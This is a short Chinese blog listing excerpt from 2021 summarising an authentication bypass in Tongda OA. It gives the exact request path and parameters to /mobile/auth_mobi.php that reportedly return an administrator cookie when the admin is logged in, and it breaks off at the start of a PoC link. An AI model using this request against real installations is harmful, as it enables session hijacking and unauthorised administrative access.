2021年3月15日
通达OA任意用户登录
摘要: 描述 访问http://xx.xx.x.xx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0链接后即可获得管理员cookie,直接访问/general/目录进入后台即可 漏洞利用条件 管理员在线 POC http://xx.xx.x.xx/mobile/a 阅读全文
posted @ 2021-03-15 23:42 追得上的梦想 阅读(656) 评论(0) 推荐(0) 编辑